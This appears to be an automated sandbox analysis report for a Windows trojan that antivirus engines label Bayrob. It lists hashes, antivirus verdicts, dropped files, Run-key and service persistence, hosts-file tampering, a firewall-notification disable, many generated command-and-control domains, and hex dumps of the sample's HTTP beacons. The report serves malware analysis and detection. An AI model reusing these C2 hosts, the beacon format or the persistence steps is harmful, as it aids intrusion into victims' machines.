| Analysis Date | 2015-08-11 06:17:25 |
|---|---|
| MD5 | f9471cc5b97a16dc357a1111464ee07c |
| SHA1 | 3751b8fe39b19102d6c727f1273d83a837f64842 |
Static Details:
| File type | PE32 executable for MS Windows (GUI) Intel 80386 32-bit | |
|---|---|---|
| Section | .text md5: 1965583b4bc21d858270cd4cc78df470 sha1: 61233fedce2766b98b947b64fd72d256cbd99389 size: 1242624 | |
| Section | .rdata md5: 6a08f6eae858c8e615c098a927cdc8ae sha1: 786282330bf3a0d25d0a9d1b5fe29d51185103b8 size: 336384 | |
| Section | .data md5: 8f9789f3c1133f0d2f67529b6f18a2aa sha1: f508e64fd8c7a70075017fff8b5191721f86f934 size: 8192 | |
| Section | .reloc md5: 5b42180c632000afeff526e414c9bba3 sha1: 849d3de80fe83c1b7ca61116b482a8b41f1eda45 size: 163328 | |
| Timestamp | 2015-05-11 03:53:51 | |
| Packer | VC8 -> Microsoft Corporation | |
| PEhash | 9eb8506a49ad4f43e0ea72ef5abc0aa89010d7d0 | |
| IMPhash | c6ceab21a9f039b779deb2a598884b77 | |
| AV | Zillya! | no_virus |
| AV | Trend Micro | no_virus |
| AV | BullGuard | Gen:Variant.Kazy.611782 |
| AV | Arcabit (arcavir) | Gen:Variant.Kazy.611782 |
| AV | CA (E-Trust Ino) | no_virus |
| AV | ClamAV | no_virus |
| AV | Microsoft Security Essentials | Trojan:Win32/Dynamer!ac |
| AV | Fortinet | W32/Bayrob.X!tr |
| AV | F-Secure | Gen:Variant.Kazy.611782 |
| AV | Dr. Web | Trojan.Bayrob.5 |
| AV | Eset (nod32) | Win32/Bayrob.Z |
| AV | Emsisoft | Gen:Variant.Kazy.611782 |
| AV | Rising | no_virus |
| AV | Twister | no_virus |
| AV | Mcafee | Trojan-FGIJ!F9471CC5B97A |
| AV | BitDefender | Gen:Variant.Kazy.611782 |
| AV | MicroWorld (escan) | Gen:Variant.Kazy.611782 |
| AV | Ad-Aware | Gen:Variant.Kazy.611782 |
| AV | K7 | Trojan ( 004c77f41 ) |
| AV | Avira (antivir) | TR/Crypt.Xpack.274632 |
| AV | VirusBlokAda (vba32) | no_virus |
| AV | Alwil (avast) | Dropper-OJQ [Drp] |
| AV | Symantec | Downloader.Upatre!g15 |
| AV | Authentium | W32/SoxGrave.A2.gen!Eldorado |
| AV | MalwareBytes | no_virus |
| AV | Ikarus | Trojan.Win32.Bayrob |
| AV | Grisoft (avg) | Win32/Cryptor |
| AV | Frisk (f-prot) | no_virus |
| AV | Padvish | no_virus |
| AV | Kaspersky | Trojan.Win32.Generic |
| AV | CAT (quickheal) | no_virus |
Runtime Details:
| Screenshot |  |
|---|
Process
↳ C:\malware.exe
| Creates File | C:\Documents and Settings\Administrator\Local Settings\Temp\ihx4tgv5z2zi8qmvivsmwy.exe |
|---|---|
| Creates File | C:\WINDOWS\system32\zqijbeugpfdvf\tst |
| Creates Process | C:\Documents and Settings\Administrator\Local Settings\Temp\ihx4tgv5z2zi8qmvivsmwy.exe |
Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\ihx4tgv5z2zi8qmvivsmwy.exe
| Registry | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Portable Office Spooler COM ➝ C:\WINDOWS\system32\qsjkjfczpevb.exe |
|---|---|
| Creates File | C:\WINDOWS\system32\drivers\etc\hosts |
| Creates File | C:\WINDOWS\system32\zqijbeugpfdvf\etc |
| Creates File | C:\WINDOWS\system32\zqijbeugpfdvf\lck |
| Creates File | C:\WINDOWS\system32\qsjkjfczpevb.exe |
| Creates File | C:\WINDOWS\system32\zqijbeugpfdvf\tst |
| Deletes File | C:\WINDOWS\system32\\drivers\etc\hosts |
| Creates Process | C:\WINDOWS\system32\qsjkjfczpevb.exe |
| Creates Service | Installer Disk Secure Background Defender - C:\WINDOWS\system32\qsjkjfczpevb.exe |
Process
↳ Pid 812
Process
↳ Pid 860
Process
↳ C:\WINDOWS\System32\svchost.exe
| Creates File | C:\WINDOWS\Prefetch\RUNDLL32.EXE-1BC69D2D.pf |
|---|---|
| Creates File | C:\WINDOWS\Prefetch\CMD.EXE-087B4001.pf |
| Creates File | C:\WINDOWS\Prefetch\IHX4TGV5Z2ZI8QMVIVSMWY.EXE-33062B35.pf |
| Creates File | C:\WINDOWS\Prefetch\3751B8FE39B19102D6C727F1273D8-23C8FED8.pf |
| Creates File | C:\WINDOWS\Prefetch\NET1.EXE-029B9DB4.pf |
| Creates File | C:\WINDOWS\Prefetch\USERINIT.EXE-30B18140.pf |
| Creates File | C:\WINDOWS\Prefetch\READER_SL.EXE-3614FA6E.pf |
| Creates File | PIPE\lsarpc |
| Creates File | \Device\Afd\Endpoint |
| Creates File | C:\WINDOWS\Prefetch\QSJKJFCZPEVB.EXE-14A0EFF0.pf |
| Creates File | C:\WINDOWS\Prefetch\EXPLORER.EXE-082F38A9.pf |
| Creates File | C:\WINDOWS\Prefetch\monitor.exe-1949D260.pf |
| Creates File | C:\WINDOWS\Prefetch\IHX4TGVFHIZI8QM.EXE-01E31DA4.pf |
| Creates File | C:\WINDOWS\system32\WBEM\Logs\wbemess.log |
| Creates File | C:\WINDOWS\Prefetch\svchost.EXE-0C867EC1.pf |
| Creates File | C:\WINDOWS\Prefetch\KFKLWGAYGBM.EXE-09E2B9E2.pf |
Process
↳ Pid 1120
Process
↳ Pid 1216
Process
↳ Pid 1328
Process
↳ Pid 1876
Process
↳ Pid 1248
Process
↳ C:\WINDOWS\system32\qsjkjfczpevb.exe
| Registry | HKEY_LOCAL_MACHINE\Software\Microsoft\Security Center\FirewallDisableNotify ➝ 1 |
|---|---|
| Creates File | C:\WINDOWS\system32\zqijbeugpfdvf\cfg |
| Creates File | C:\WINDOWS\system32\kfklwgaygbm.exe |
| Creates File | C:\WINDOWS\system32\zqijbeugpfdvf\rng |
| Creates File | C:\WINDOWS\system32\zqijbeugpfdvf\tst |
| Creates File | C:\WINDOWS\TEMP\ihx4tgvfhizi8qm.exe |
| Creates File | pipe\net\NtControlPipe10 |
| Creates File | C:\WINDOWS\system32\zqijbeugpfdvf\run |
| Creates File | C:\WINDOWS\system32\zqijbeugpfdvf\lck |
| Creates File | \Device\Afd\Endpoint |
| Deletes File | C:\WINDOWS\TEMP\ihx4tgvfhizi8qm.exe |
| Creates Process | WATCHDOGPROC "c:\windows\system32\qsjkjfczpevb.exe" |
| Creates Process | C:\WINDOWS\TEMP\ihx4tgvfhizi8qm.exe -r 33148 tcp |
Process
↳ C:\WINDOWS\system32\qsjkjfczpevb.exe
| Creates File | C:\WINDOWS\system32\zqijbeugpfdvf\tst |
|---|
Process
↳ WATCHDOGPROC "c:\windows\system32\qsjkjfczpevb.exe"
| Creates File | C:\WINDOWS\system32\zqijbeugpfdvf\tst |
|---|
Process
↳ C:\WINDOWS\TEMP\ihx4tgvfhizi8qm.exe -r 33148 tcp
| Creates File | \Device\Afd\Endpoint |
|---|---|
| Winsock DNS | 239.255.255.250 |
Network Details:
| DNS | recordsoldier.net Type: A 208.91.197.241 |
|---|---|
| DNS | fliersurprise.net Type: A 208.91.197.241 |
| DNS | historybright.net Type: A 208.91.197.241 |
| DNS | chiefsoldier.net Type: A 208.91.197.241 |
| DNS | classsurprise.net Type: A 208.91.197.241 |
| DNS | thosecontinue.net Type: A 208.91.197.241 |
| DNS | throughcontain.net Type: A 208.91.197.241 |
| DNS | belongguard.net Type: A 208.91.197.241 |
| DNS | maybellinethaddeus.net Type: A 208.91.197.241 |
| DNS | kimberleyshavonne.net Type: A 208.91.197.241 |
| DNS | naildeep.com Type: A 74.220.215.218 |
| DNS | riddenstorm.net Type: A 66.147.240.171 |
| DNS | destroystorm.net Type: A 216.239.138.86 |
| DNS | wellmark.net Type: A 218.85.139.71 |
| DNS | wellnews.net Type: A 198.72.112.7 |
| DNS | ringmark.net Type: A 104.28.4.24 |
| DNS | ringmark.net Type: A 104.28.5.24 |
| DNS | westking.net Type: A 125.209.214.79 |
| DNS | tableking.net Type: A 72.52.4.119 |
| DNS | leadking.net Type: A 141.8.224.239 |
| DNS | husbandfound.net Type: A |
| DNS | leadershort.net Type: A |
| DNS | eggbraker.com Type: A |
| DNS | ithouneed.com Type: A |
| DNS | nosebroke.net Type: A |
| DNS | nosemark.net Type: A |
| DNS | nosenews.net Type: A |
| DNS | ringstate.net Type: A |
| DNS | favorstate.net Type: A |
| DNS | ringbroke.net Type: A |
| DNS | favorbroke.net Type: A |
| DNS | favormark.net Type: A |
| DNS | ringnews.net Type: A |
| DNS | favornews.net Type: A |
| DNS | sorrythan.net Type: A |
| DNS | fiftythan.net Type: A |
| DNS | sorryread.net Type: A |
| DNS | fiftyread.net Type: A |
| DNS | sorrymile.net Type: A |
| DNS | fiftymile.net Type: A |
| DNS | sorryking.net Type: A |
| DNS | fiftyking.net Type: A |
| DNS | theirthan.net Type: A |
| DNS | likrthan.net Type: A |
| DNS | theirread.net Type: A |
| DNS | likrread.net Type: A |
| DNS | theirmile.net Type: A |
| DNS | likrmile.net Type: A |
| DNS | theirking.net Type: A |
| DNS | likrking.net Type: A |
| DNS | fearthan.net Type: A |
| DNS | westthan.net Type: A |
| DNS | fearread.net Type: A |
| DNS | westread.net Type: A |
| DNS | fearmile.net Type: A |
| DNS | westmile.net Type: A |
| DNS | fearking.net Type: A |
| DNS | tablethan.net Type: A |
| DNS | leadthan.net Type: A |
| DNS | tableread.net Type: A |
| DNS | leadread.net Type: A |
| DNS | tablemile.net Type: A |
| DNS | leadmile.net Type: A |
| DNS | pointthan.net Type: A |
| DNS | callthan.net Type: A |
| DNS | pointread.net Type: A |
| DNS | callread.net Type: A |
| DNS | pointmile.net Type: A |
| HTTP GET | http://recordsoldier.net/index.php?method=validate&mode=sox&v=050&sox=4f9cca03&lenhdr User-Agent: |
| HTTP GET | http://fliersurprise.net/index.php?method=validate&mode=sox&v=050&sox=4f9cca03&lenhdr User-Agent: |
| HTTP GET | http://historybright.net/index.php?method=validate&mode=sox&v=050&sox=4f9cca03&lenhdr User-Agent: |
| HTTP GET | http://chiefsoldier.net/index.php?method=validate&mode=sox&v=050&sox=4f9cca03&lenhdr User-Agent: |
| HTTP GET | http://classsurprise.net/index.php?method=validate&mode=sox&v=050&sox=4f9cca03&lenhdr User-Agent: |
| HTTP GET | http://thosecontinue.net/index.php?method=validate&mode=sox&v=050&sox=4f9cca03&lenhdr User-Agent: |
| HTTP GET | http://throughcontain.net/index.php?method=validate&mode=sox&v=050&sox=4f9cca03&lenhdr User-Agent: |
| HTTP GET | http://belongguard.net/index.php?method=validate&mode=sox&v=050&sox=4f9cca03&lenhdr User-Agent: |
| HTTP GET | http://maybellinethaddeus.net/index.php?method=validate&mode=sox&v=050&sox=4f9cca03&lenhdr User-Agent: |
| HTTP GET | http://kimberleyshavonne.net/index.php?method=validate&mode=sox&v=050&sox=4f9cca03&lenhdr User-Agent: |
| HTTP GET | http://naildeep.com/index.php?method=validate&mode=sox&v=050&sox=4f9cca03&lenhdr User-Agent: |
| HTTP GET | http://riddenstorm.net/index.php?method=validate&mode=sox&v=050&sox=4f9cca03&lenhdr User-Agent: |
| HTTP GET | http://destroystorm.net/index.php?method=validate&mode=sox&v=050&sox=4f9cca03&lenhdr User-Agent: |
| HTTP GET | http://wellmark.net/index.php?method=validate&mode=sox&v=050&sox=4f9cca03&lenhdr User-Agent: |
| HTTP GET | http://wellnews.net/index.php?method=validate&mode=sox&v=050&sox=4f9cca03&lenhdr User-Agent: |
| HTTP GET | http://ringmark.net/index.php?method=validate&mode=sox&v=050&sox=4f9cca03&lenhdr User-Agent: |
| HTTP GET | http://westking.net/index.php?method=validate&mode=sox&v=050&sox=4f9cca03&lenhdr User-Agent: |
| HTTP GET | http://tableking.net/index.php?method=validate&mode=sox&v=050&sox=4f9cca03&lenhdr User-Agent: |
| HTTP GET | http://leadking.net/index.php?method=validate&mode=sox&v=050&sox=4f9cca03&lenhdr User-Agent: |
| Flows TCP | 192.168.1.1:1032 ➝ 208.91.197.241:80 |
| Flows TCP | 192.168.1.1:1033 ➝ 208.91.197.241:80 |
| Flows TCP | 192.168.1.1:1034 ➝ 208.91.197.241:80 |
| Flows TCP | 192.168.1.1:1035 ➝ 208.91.197.241:80 |
| Flows TCP | 192.168.1.1:1036 ➝ 208.91.197.241:80 |
| Flows TCP | 192.168.1.1:1038 ➝ 208.91.197.241:80 |
| Flows TCP | 192.168.1.1:1039 ➝ 208.91.197.241:80 |
| Flows TCP | 192.168.1.1:1044 ➝ 208.91.197.241:80 |
| Flows TCP | 192.168.1.1:1045 ➝ 208.91.197.241:80 |
| Flows TCP | 192.168.1.1:1046 ➝ 208.91.197.241:80 |
| Flows TCP | 192.168.1.1:1047 ➝ 74.220.215.218:80 |
| Flows TCP | 192.168.1.1:1048 ➝ 66.147.240.171:80 |
| Flows TCP | 192.168.1.1:1049 ➝ 216.239.138.86:80 |
| Flows TCP | 192.168.1.1:1050 ➝ 218.85.139.71:80 |
| Flows TCP | 192.168.1.1:1051 ➝ 198.72.112.7:80 |
| Flows TCP | 192.168.1.1:1052 ➝ 104.28.4.24:80 |
| Flows TCP | 192.168.1.1:1053 ➝ 125.209.214.79:80 |
| Flows TCP | 192.168.1.1:1054 ➝ 72.52.4.119:80 |
| Flows TCP | 192.168.1.1:1055 ➝ 141.8.224.239:80 |
Raw Pcap
0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 39636361 3033266c 656e6864 x=4f9cca03&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a207265 636f7264 736f6c64 6965722e : recordsoldier. 0x00000080 (00128) 6e65740d 0a0d0a net.... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 39636361 3033266c 656e6864 x=4f9cca03&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a20666c 69657273 75727072 6973652e : fliersurprise. 0x00000080 (00128) 6e65740d 0a0d0a net.... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 39636361 3033266c 656e6864 x=4f9cca03&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a206869 73746f72 79627269 6768742e : historybright. 0x00000080 (00128) 6e65740d 0a0d0a net.... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 39636361 3033266c 656e6864 x=4f9cca03&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a206368 69656673 6f6c6469 65722e6e : chiefsoldier.n 0x00000080 (00128) 65740d0a 0d0a0a et..... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 39636361 3033266c 656e6864 x=4f9cca03&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a20636c 61737373 75727072 6973652e : classsurprise. 0x00000080 (00128) 6e65740d 0a0d0a net.... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 39636361 3033266c 656e6864 x=4f9cca03&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a207468 6f736563 6f6e7469 6e75652e : thosecontinue. 0x00000080 (00128) 6e65740d 0a0d0a net.... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 39636361 3033266c 656e6864 x=4f9cca03&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a207468 726f7567 68636f6e 7461696e : throughcontain 0x00000080 (00128) 2e6e6574 0d0a0d0a .net.... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 39636361 3033266c 656e6864 x=4f9cca03&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a206265 6c6f6e67 67756172 642e6e65 : belongguard.ne 0x00000080 (00128) 740d0a0d 0a0a0d0a t....... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 39636361 3033266c 656e6864 x=4f9cca03&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a206d61 7962656c 6c696e65 74686164 : maybellinethad 0x00000080 (00128) 64657573 2e6e6574 0d0a0d0a deus.net.... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 39636361 3033266c 656e6864 x=4f9cca03&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a206b69 6d626572 6c657973 6861766f : kimberleyshavo 0x00000080 (00128) 6e6e652e 6e65740d 0a0d0a0a nne.net..... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 39636361 3033266c 656e6864 x=4f9cca03&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a206e61 696c6465 65702e63 6f6d0d0a : naildeep.com.. 0x00000080 (00128) 0d0a652e 6e65740d 0a0d0a0a ..e.net..... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 39636361 3033266c 656e6864 x=4f9cca03&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a207269 6464656e 73746f72 6d2e6e65 : riddenstorm.ne 0x00000080 (00128) 740d0a0d 0a65740d 0a0d0a0a t....et..... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 39636361 3033266c 656e6864 x=4f9cca03&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a206465 7374726f 7973746f 726d2e6e : destroystorm.n 0x00000080 (00128) 65740d0a 0d0a740d 0a0d0a0a et....t..... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 39636361 3033266c 656e6864 x=4f9cca03&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a207765 6c6c6d61 726b2e6e 65740d0a : wellmark.net.. 0x00000080 (00128) 0d0a0d0a 0d0a740d 0a0d0a0a ......t..... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 39636361 3033266c 656e6864 x=4f9cca03&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a207765 6c6c6e65 77732e6e 65740d0a : wellnews.net.. 0x00000080 (00128) 0d0a0d0a 0d0a740d 0a0d0a0a ......t..... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 39636361 3033266c 656e6864 x=4f9cca03&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a207269 6e676d61 726b2e6e 65740d0a : ringmark.net.. 0x00000080 (00128) 0d0a0d0a 0d0a740d 0a0d0a0a ......t..... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 39636361 3033266c 656e6864 x=4f9cca03&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a207765 73746b69 6e672e6e 65740d0a : westking.net.. 0x00000080 (00128) 0d0a0d0a 0d0a740d 0a0d0a0a ......t..... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 39636361 3033266c 656e6864 x=4f9cca03&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a207461 626c656b 696e672e 6e65740d : tableking.net. 0x00000080 (00128) 0a0d0a0a 0d0a740d 0a0d0a0a ......t..... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 39636361 3033266c 656e6864 x=4f9cca03&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a206c65 61646b69 6e672e6e 65740d0a : leadking.net.. 0x00000080 (00128) 0d0a0a0a 0d0a740d 0a0d0a0a ......t.....
Strings